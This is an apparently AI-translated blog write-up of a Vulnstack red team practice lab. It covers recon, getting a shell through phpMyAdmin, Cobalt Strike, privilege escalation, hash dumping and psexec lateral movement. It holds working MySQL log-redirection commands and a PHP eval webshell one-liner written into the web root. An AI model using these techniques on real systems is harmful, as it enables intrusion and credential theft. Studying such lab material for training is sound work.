lca

真正的不自由，是在自己的心中设下牢笼。

ATT&CK Red Team Assessment Practical Target - 1

Apr 13, 2024#靶场 #渗透 #网络安全 #漏洞复现 #内网渗透 #提权 #报告683

AI Translation

This post is translated from Chinese into English through AI.View Original

AI-generated summary

This is a simple target field for students to practice penetration testing, focusing on familiarizing with the penetration process. The environment may have some issues, but the overall process is fine. The setup includes web server, Windows 7, Windows 2008 DC, and Windows 2003 domain member. Penetration process involves information gathering, port scanning, directory scanning, PHPInfo page, PHPMyAdmin login, and creating a web shell.

Introduction#

The target environment comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

A simple target environment originally intended for student assessments, but it was not utilized. The lateral domain penetration only used the psexec module from Cobalt Strike, and the main content is to familiarize oneself with some penetration processes.

Many vulnerabilities in the target environment could not be successfully reproduced due to some environmental issues, but the overall process is fine.

Environment Setup#

You need to disable accelerated 3D graphics; otherwise, the virtual machine cannot start.

The topology is as follows:

The network settings are as follows, using VMnet2 and VMnet8:

Web server (VM1) - Win7 (dual network card, NAT mode + vmnet2 (host-only))

IP: 192.168.111.128 and 192.168.52.143

Start phpstudy

DNS points to DC

Win2008 DC (VM3)

IP: 192.168.52.138

Win03 domain member (VM2)

IP: 192.168.52.141

View the current domain

Penetration Process#

Information Gathering#

Nmap Port Scanning#

Sword Scanning#

Directory Scanning#

phpinfo page

If the password is: root/root

phpMyAdmin Getshell#

Get shell through logs

Check if logging is enabled and the log storage location: SHOW VARIABLES LIKE "general_log%";

Enable logging: set global general_log='on';
Check if enabled: SHOW VARIABLES LIKE "general_log%"

Set the log file to a malicious file, first find the website directory

Set the log path: set global general_log_file ='C:\\phpStudy\\WWW\\s.php';

Successfully set

After preparing the work, start writing the shell. You only need to query through SQL statements.

select "<?php @eval($_POST[cmd]);?>";

Access web shell:
http://192.168.111.128/ss.php

Ant Sword connection:

The website's port 80 is yxcms

Log in to the backend, and you can also execute SQL statements.

Web shell view IP address

Found dual network cards

Cobalt Strike Startup#

Go online to operate on Cobalt Strike.

Server

Client

Establish a listener

Generate payload

Upload the payload to Ant Sword for execution

Run exe, Cobalt Strike goes online.

Sleep 0

Shell whoami

Privilege Escalation#

Use getsystem on Cobalt Strike to elevate privileges and obtain system permissions.

Internal Network Information Collection#

Click target to find three machines. If nothing opens, scan the ports, and you will find them.

Dump hash

Obtain plaintext passwords

Lateral Movement#

After obtaining the password, use psexec for lateral movement. Here, the passwords for the three machines are the same; if they are different, lateral movement via SMB will not be possible.

Select psexec64, 64-bit

Obtain the domain controller server.

Using the same method to control the 141, the Win2003 domain member machine.

You need to select psexec, 32-bit

Check the IP

Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.

Blockchain ID
#53657-155
Owner
0x0bd0c6639592f2265c3dcd019be4fe39e5b00428
Transaction Hash
Creation 0xb8007908...d85ebec6eb Last Update 0xb8007908...d85ebec6eb
IPFS Address
ipfs://QmX7ub26Yx8RJDQdcZu9eL3YFHjjejMMTj3bWgZrTzncg2